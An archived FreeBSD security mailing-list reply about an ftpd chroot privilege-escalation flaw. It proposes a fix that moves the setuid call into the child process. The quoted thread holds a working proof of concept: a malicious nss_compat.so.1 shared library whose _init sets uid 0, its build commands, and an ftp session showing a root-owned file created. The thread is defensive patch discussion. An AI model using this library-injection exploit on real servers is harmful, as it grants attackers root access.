Date: Thu, 1 Dec 2011 03:10:55 +0200 From: Titus Manea <titus@edc.ro> To: freebsd-security@freebsd.org Subject: Re: ftpd security issue ? Message-ID: <20111201031055.A67122@buko.edc.ro> In-Reply-To: <4ED6D1CD.9080700@sentex.net>; from mike@sentex.net on Wed, Nov 30, 2011 at 08:01:01PM -0500 References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net>
next in thread | previous in thread | raw e-mail | index | archive | help
Move the seteuid
pid = (strcmp(gargv[0], _PATH_LS) == 0) ? fork() : vfork();
switch(pid) {
case -1: /* error */
(void)close(pdes[0]);
(void)close(pdes[1]);
goto pfree;
/* NOTREACHED */
case 0: /* child */
setuid(geteuid());
On Wed, Nov 30, 2011 at 08:01:01PM -0500, Mike Tancsa wrote:
> On 11/30/2011 7:01 PM, Xin LI wrote:
> >
> >> BTW. This vulnerability affects only configurations, where
> >> /etc/ftpchroot exists or anonymous user is allowed to create files
> >> inside etc and lib dirs.
> >
> > This doesn't seem to be typical configuration or no?
>
> I think in shared hosting environments it would be somewhat common. For
> annon ftp, I dont think the anon user would be able to create / write to
> a lib directory.
>
> >
> > Will the attached patch fix the problem?
> >
> > (I think libc should just refuse /etc/nsswitch.conf and libraries if
> > they are writable by others by the way)
>
> It does not seem to prevent the issue for me. Using Przemyslaw program's,
>
> #include <stdio.h>
> #include <fcntl.h>
>
> void _init() {
> setuid(0);
> setgid(0);
> FILE *fp = fopen("/newfile", "w+");
> fprintf(fp, "%d %d\n", getuid(), geteuid());
> }
>
> cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o
> dummy.so dummy.o -nostartfiles ; mv dummy.so
> ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1
>
>
> ftp localhost
> Trying 127.0.0.1...
> Connected to localhost.
> 220 vmtest.localdomain FTP server (Version 6.00LS) ready.
> Name (localhost:mdtancsa): testuser
> 331 Password required for testuser.
> Password:
> 230 User testuser logged in, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> dir
> 229 Entering Extended Passive Mode (|||62436|)
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 106
> -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc
> -rw------- 1 1002 1002 193 Nov 30 16:36 .history
> drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc
> -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd
> drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib
> -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c
> -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh
> 226 Transfer complete.
> ftp> dir
> 229 Entering Extended Passive Mode (|||50577|)
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 108
> -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc
> -rw------- 1 1002 1002 193 Nov 30 16:36 .history
> drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc
> -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd
> drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib
> -rw-r--r-- 1 0 1002 4 Nov 30 19:58 newfile
> -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c
> -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh
> 226 Transfer complete.
> ftp>
>
> the file created is root
>
>
> --
> -------------------
> Mike Tancsa, tel +1 519 651 3400
> Sentex Communications, mike@sentex.net
> Providing Internet services since 1994 www.sentex.net
> Cambridge, Ontario Canada http://www.tancsa.com/
> _______________________________________________
> freebsd-security@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
--
---------------------------------------------------------------------
How an engineer writes a program: Starts by debugging an empty file...
Titus Manea <titus@edc.ro> | Eastern Digital Inc.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20111201031055.A67122>